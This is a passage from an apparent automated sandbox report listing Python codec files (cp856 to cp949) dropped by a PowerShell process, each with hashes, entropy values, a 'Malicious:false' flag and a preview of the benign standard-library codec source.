                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp856 generated from 'MAPPINGS/VENDORS/MISC/CP856.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp856',.. encode=Cod
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):34602
                                                                                                                                                                                                              Entropy (8bit):4.528500526287676
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:BHLsuYDvR8LmUdMAJZjy5xSwrE0PXRN/h4wcuSMMksbYevMScnepGW449jBRWJn+:4FAcSkjh4wVMuecebHWJn4AVk2Yr
                                                                                                                                                                                                              MD5:DD1F84F2921D49CF944DF4BCF6ECF7E8
                                                                                                                                                                                                              SHA1:7EEE7B6CAA8120C4D26E96FCCC21C4474BD2652A
                                                                                                                                                                                                              SHA-256:8AE4CB6989342105C513678480ECBDF2D5D8E534E69704964D0FB4D2A960039B
                                                                                                                                                                                                              SHA-512:92DB4E13E84876B51B2600F503C56857E96F06A1F23C327762372F97628C766B0E524568672FBF3BA07B26A4284C1AEB522BD433F3ABB9704CF9277157B95832
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP857.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp857',.. encode=Codec().encode,..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):34713
                                                                                                                                                                                                              Entropy (8bit):4.518245366498134
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:CLsuYDvR9SUpAJZjJBIX6l6xSwrE0PXRN/h4wcuSM5kw9evMStmxNpGf6w6F4490:3jAYSkjh4wV5j9e2THWJn4AVgq/r
                                                                                                                                                                                                              MD5:F0B8B1B55A90C1EA058759AD18834A75
                                                                                                                                                                                                              SHA1:FD7AFDDE40956991241D6130F72A40D1C655B15B
                                                                                                                                                                                                              SHA-256:04A67B43EFA1E0CE2D80791C290BC2C8EA01C3991EB3DF37528B1DD575B12330
                                                                                                                                                                                                              SHA-512:72F7905616B3B3F9D961E4A605B15A8B9D427E13A82B1BA9AC1F2380E961DE6848A9C5068A57DE6CF62E0CEC5D9E6C2D7310F906D0EC16CAC345E48AA1ABF352
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec for CP858, modified from cp850....."""....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp858',.. encode=Codec().encode,.. decode=Codec().decode,..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):35379
                                                                                                                                                                                                              Entropy (8bit):4.587856666654445
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:/HLsuYDvRGYj/bXdiaYzIUqwrE0PXRN/h4wcuSMBmkwNvuD8HtIMpWZEt449jBRq:SfnZkjh4wVMjNjxAEJHWJn4AVWIcOMy
                                                                                                                                                                                                              MD5:1F0B22586EC65A59C966A709024E35E4
                                                                                                                                                                                                              SHA1:143BCD55359AD3B9506D6583D04A8C1BF32366BD
                                                                                                                                                                                                              SHA-256:E2B8B4B2658ECC3DC53D4B0760AEA95517BE298FAFBFA69574B08933747922BE
                                                                                                                                                                                                              SHA-512:7859FBC58DD5B68614F3F83DA28AA600E86A6F2DB7E011870B212E4D721478A8028D893AB666212DA1B1D38D41BB9E03B985C555154E33A20D71D2449DE7FDF2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP860.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp860',.. encode=Codec().encode,..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):35331
                                                                                                                                                                                                              Entropy (8bit):4.588014438980019
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:FfLnZkjh4wVlPVjxAEJHWJn4AVPScqPMy:JqjhJVbxAEJ2BFDS
                                                                                                                                                                                                              MD5:83CFB87E2BB8A42739A03DA1D979AF6A
                                                                                                                                                                                                              SHA1:97C16F469B56F437F521C482C613D4AEC6EF3206
                                                                                                                                                                                                              SHA-256:D7FE52A55FDCAC4E6E9ECDC4884C793D1FEB345D0276B074214DB1BF4BCF3033
                                                                                                                                                                                                              SHA-512:589B6933A5E45176210EA18997B056F41A6B03D765668B7328577D5CF8EEC9CF55B6247E225835D4666EB2AA0714ED927902929B75E27711437612BF9463D89E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP861.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp861',.. encode=Codec().encode,..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):34068
                                                                                                                                                                                                              Entropy (8bit):4.605627535144471
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:oPFL+DZkjh4wVOjIVjx79EJHWJn4AVE6AsqPMy:8UDqjhJVkKx79EJ2BFX7S
                                                                                                                                                                                                              MD5:D22ABCA28D2425D802F53021178224A1
                                                                                                                                                                                                              SHA1:D26E991DA020C07E58C03506347803A88230A6BB
                                                                                                                                                                                                              SHA-256:6D99C0415136CE45AB438C8238772A1A132E7B38212C623467C2170F1A8AAE75
                                                                                                                                                                                                              SHA-512:66E7C898ED749CF2706EA877FB099F50477EC5EA3C0FB4F2FA189F4E849D37AD01E7899BFC04A3D60D6CD5A1D42CFF69E71D0A39BE5F51C919543D22C2D82C6A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP862.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp862',.. encode=Codec().encode,..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):34950
                                                                                                                                                                                                              Entropy (8bit):4.597040843450106
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:DQ6LHZkjh4wV5VvxAEJHWJn4AV7qmqPMy:VqjhJVjxAEJ2BFtS
                                                                                                                                                                                                              MD5:13279C9ED7C1F7AF8722F9EB3A1B595B
                                                                                                                                                                                                              SHA1:BCF042EA7D75E802EE940B3C979626DCD0FAAD33
                                                                                                                                                                                                              SHA-256:32FC23645A773EBB3247B3692D0525EA43513B358DD0350EF3A171864E326335
                                                                                                                                                                                                              SHA-512:95CDDCB21D1E738A6850BEA50F6ABD8BBC537F916AC1B3BC16449710EECCDD6B9A54A584A6E40F89E3068B601F43EB297214B1585C9F658B7901BE8F1CBB5162
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP863.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp863',.. encode=Codec().encode,..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):34353
                                                                                                                                                                                                              Entropy (8bit):4.587380932355719
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:THLsuYDvRKLaH2bdfn8yrE0PXRQ/h4wcuSMurHUF3zZUB+yEsqj44HjBRWJn4bkg:On2quKh4wVU2HWJn4AVXwn
                                                                                                                                                                                                              MD5:30CBEC79DA2D6565A1C62EF240272223
                                                                                                                                                                                                              SHA1:00C4D427BBE2ADEC7FD3EB73C4F025523D352EA6
                                                                                                                                                                                                              SHA-256:E8879DB3682B0F234BFCF97FE74A3A7DB63CFD5F40281F580E911932DEC4A4D3
                                                                                                                                                                                                              SHA-512:69191F9A4D7089C74A5CA459D0A325BD21347AAC6CAA7F2D4DBE7835A73CD31CCD23C395B11ED91AB55C1592456C7D39A6F3D2CBF1CD2338A27B921A41435864
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP864.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp864',.. encode=Codec().encode,..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):35316
                                                                                                                                                                                                              Entropy (8bit):4.589958887283082
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:RQVLCZkjh4wVXjIVSxAEJHWJn4AVUVcqPMy:PqjhJVz5xAEJ2BFfS
                                                                                                                                                                                                              MD5:FE9E2A87FF8164A9602AF05FE30F64FC
                                                                                                                                                                                                              SHA1:3BEC0843F48826EC25A9D660B9A578148085D82F
                                                                                                                                                                                                              SHA-256:0722BBF3A0F93700E99B3816E9E52C75674E14319146F9AC3FD1E17F87E66CB0
                                                                                                                                                                                                              SHA-512:B1C5797EC453694C0E285084F25B7825C13C59B2754DE58319745923784BB5105485883C6E8BDDFEAC3267EE8E9CDD34A76155282C2AD774CEF58FBC6AC476FC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP865.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp865',.. encode=Codec().encode,..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):35094
                                                                                                                                                                                                              Entropy (8bit):4.600424943983017
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:lHLsuYDvRI0CnFdiaYzFFwrE0PXRN/h4wcuSMXY3uD8HtIMpW5449jBRWJn4bkV1:EVMYkjh4wVXYrxcHWJn4AVo0kQMy
                                                                                                                                                                                                              MD5:BE6B4AAAD297AE734F59800072CCAA30
                                                                                                                                                                                                              SHA1:6FE723B5DA8606EC26DC4523AA6F6EEEDACD16E0
                                                                                                                                                                                                              SHA-256:E3A033B3B790018A0A02E9F67A03530753C7FB5F94B6ABA84F5173D29FB389AE
                                                                                                                                                                                                              SHA-512:5E4B443A4778EAF7ECFA41E88CC259A6ABB2CCA0F578F7F72800C201D280C3AC033528EBF1043862DD64896DDEA444190FFF29C6EC7AEB6DE00B5E6C7EBAA86C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP866.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp866',.. encode=Codec().encode,..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):33654
                                                                                                                                                                                                              Entropy (8bit):4.583176642392538
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:9XtKOodhREjkjh4wV+TRLMCXkWDoq4HWJn4AV+/S0sOkYmPr:UhR1jhJVBukWDo72BFEEN
                                                                                                                                                                                                              MD5:FC295CB9BF854E29A7EAB588DF20A662
                                                                                                                                                                                                              SHA1:F9D95ED00BBCB7CB89661A0BB93880BF08A70802
                                                                                                                                                                                                              SHA-256:4322E184D3C1DFA56EDB013E895CBFB71130E7846F8F56BCAFC4C0082373CB6A
                                                                                                                                                                                                              SHA-512:0167CC25A48AB6B09F08233CD51C8C622AF7014642BE6E9A72F37EA8C459F67CAE04DFED076E8148C512747CD775457442528F1963CE3F677FE3B5F45AD71C1B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP869.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_map).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_map)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp869',.. encode=Codec().encode,..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12902
                                                                                                                                                                                                              Entropy (8bit):4.624503078499216
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:KHhsuOTDvRHUrXPLouhIAs2+iRvskDCYnO00pC8i1bE:nThuhIAlX/H8iG
                                                                                                                                                                                                              MD5:5E2C1051F63CEB3600F970937C5FC6E4
                                                                                                                                                                                                              SHA1:062664CD22F5DC7A52E99EDCC9C5D356C2B6F841
                                                                                                                                                                                                              SHA-256:94179E22722674527BD56386B5E9DAC5427B0F55248D1AA63E204C105DA18D8B
                                                                                                                                                                                                              SHA-512:B6643A970DDF837CA060CB511C4AFA2E4224657450455BDAEF1980ED122791991FD13BAEFD56DE10A63FC1248EAB26478EE0B0B82B0E884FCEDD71D85DCB84F3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp874 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP874.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp874',..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13161
                                                                                                                                                                                                              Entropy (8bit):4.598690745287678
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:LHhsuOTDvRUUZkPS3RI4WcMHFVleIuiZdH77eDVqeOFf2nuS:eT5RIzc+gi72DcdFOnb
                                                                                                                                                                                                              MD5:3DAB3DF72E688978781C91CEA3285C4A
                                                                                                                                                                                                              SHA1:65664E8974B621B2C461774187C483ABFA0E735F
                                                                                                                                                                                                              SHA-256:5C42ADFEC39CF9D891FBB2ED19D882C6160A00B8487B7867F9E2296B9E2F491B
                                                                                                                                                                                                              SHA-512:7F940428049BCB0A95FC67FC178749B61ABF522646A68505B5B420718E5BD8ABBF6973B48CBF17DDA48179ABBA4D31F1E2169DBD5EFA33C044414A7A02673899
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                              Preview:""" Python Character Mapping Codec cp875 generated from 'MAPPINGS/VENDORS/MICSFT/EBCDIC/CP875.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp875',.. e
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1062
                                                                                                                                                                                                              Entropy (8bit):4.549007604127859
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:n5oqwOzff/XohaZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj93cJxFpz:Oqpwhat62VJjRU8njOxLnrxLbrLKmJx/
                                                                                                                                                                                                              MD5:70E562A99A8F07255F47C5F3C05518A5
                                                                                                                                                                                                              SHA1:F1F0A00A3238B19786D88B83F9FA57D043E2D0A9
                                                                                                                                                                                                              SHA-256:F917DB40F96F9F676E45FD9F1A7FA5D9BBB67A703BDF88B546CA4DA84C4905F5
                                                                                                                                                                                                              SHA-512:48C7BF7FDA257EC6ECC4421BFEF66E026C285DABB358ED41DDB6A9FFC6D73F61DA35F25A5622FC8D9D4D086D4BFA37E67A40810D39A6FA5F538F61427304298A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# cp932.py: Python Unicode Codec for CP932..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('cp932')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='cp932',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamrea
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1062
                                                                                                                                                                                                              Entropy (8bit):4.532318933180232
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:no53qzqOzSf/XoxKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9+6cJxFV:otqzHzl62VJjRU8njOxLnrxLbrLK03Jd
                                                                                                                                                                                                              MD5:D85D0503255F9363D30F7B7AAD7355D4
                                                                                                                                                                                                              SHA1:DE0F8989F4BBE4CC9A91241DEED093BF259E2DC1
                                                                                                                                                                                                              SHA-256:DA13FD6F1BD7A1D3B48AED1FC75F7516D6A33814086CF971E030625590E9DDA0
                                                                                                                                                                                                              SHA-512:ED408E5A0B1042E0F1F94CF57171381F4B2A0491B9319BF2E0E02DB8B63BF342D7C4091B97DA8F9802B6EA0AE94EFFBE797F17E92F25E5F436BD88E11E4735B7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# cp949.py: Python Unicode Codec for CP949..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_kr, codecs..import _multibytecodec as mbc....codec = _codecs_kr.getcodec('cp949')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='cp949',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamrea
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1062
                                                                                                                                                                                                              Entropy (8bit):4.541713907609811
